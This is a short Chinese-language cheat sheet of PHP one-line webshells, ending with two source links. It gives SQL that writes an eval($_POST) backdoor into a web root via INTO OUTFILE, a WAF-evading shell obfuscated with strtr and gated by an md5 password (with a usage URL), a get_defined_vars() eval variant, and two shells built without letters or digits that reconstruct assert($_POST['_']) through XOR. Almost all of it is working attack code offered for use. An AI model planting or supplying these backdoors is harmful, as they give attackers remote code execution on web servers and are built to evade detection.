一句话shell【php】

1.mysql执行语句拿shell

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'E:\\phpStudy\\PHPTutorial\\WWW\\test.php';

2.利用md5绕过waf

---------------------
本体
<?php
        $str1 = 'aH(UUH(fsdfH(UUH(fsdf,fdgdefjg0J)r&%F%*^G*t';
        $str2 = strtr($str1,array('aH(UUH(fsdfH(UUH(fsdf,'=>'as','fdgdefjg0J)'=>'se','r&%F%*^G*t'=>'rt'));
        $str3 = strtr($str2,array('s,'=>'s','fdgdefjg0J)r&%F%*^G*'=>'er'));
        if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
                $str4 = strrev($_POST['a']);
                $str5 = strrev($str4);
                $str3($str5);
    }
?>
---------------------
本质

<?php
if(md5(@$_GET['a']) =='2858b958f59138771eae3b0c2ceda426'){
    assert($_POST['a']);
}
?>
------------------------

利用
.php?a=3fion0hj5965698jhh密码a

注：default失败!其他编码成功!

3.get_defined_vars()函数马：在过滤$的情况下可使用

<?php
eval(get_defined_vars()['_POST']['1']);
?>

4.不含字母数字马

注：只能菜刀连接!

<?php
$_=(chr(0x01)^'`').(chr(0x13)^'`').(chr(0x13)^'`').(chr(0x05)^'`').(chr(0x12)^'`').(chr(0x14)^'`');
$__='_'.(chr(0x0D)^']').(chr(0x2F)^'`').(chr(0x0E)^']').(chr(0x09)^']');
$___=$$__;
$_($___['_']);// assert($_POST['_']);
?>

或者

<?php
$_=(urldecode('%01')^'`').(urldecode('%13')^'`').(urldecode('%13')^'`').(urldecode('%05')^'`').(urldecode('%12')^'`').(urldecode('%14')^'`');
$__='_'.(urldecode('%0D')^']').(urldecode('%2F')^'`').(urldecode('%0E')^']').(urldecode('%09')^']');
$___=$$__;
$_($___['_']);// assert($_POST['_']);
?>

https://www.freebuf.com/articles/web/173579.html

https://mochazz.github.io/2017/12/04/bypass1/